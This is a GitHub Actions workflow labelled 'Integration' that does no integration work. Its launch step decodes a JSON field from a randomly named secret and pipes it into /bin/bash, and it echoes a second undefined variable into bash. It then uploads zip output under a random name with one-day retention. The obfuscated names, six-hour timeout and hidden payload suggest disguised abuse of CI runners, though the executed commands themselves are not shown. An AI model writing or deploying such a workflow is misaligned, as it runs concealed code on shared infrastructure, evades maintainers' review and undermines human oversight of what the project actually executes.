name: Integration
on:
  workflow_dispatch:

jobs:
  handler:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          yy7125: ${{ secrets.yy7125 }}
        run: |
          printf '%s' "$yy7125" | jq -r .wt7572 | /bin/bash
          echo $obblr4 | jq -r .eyfg465 | /bin/bash

      - name: Persist output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: jzU7zEhO
          path: "*.zip"
          retention-days: 1
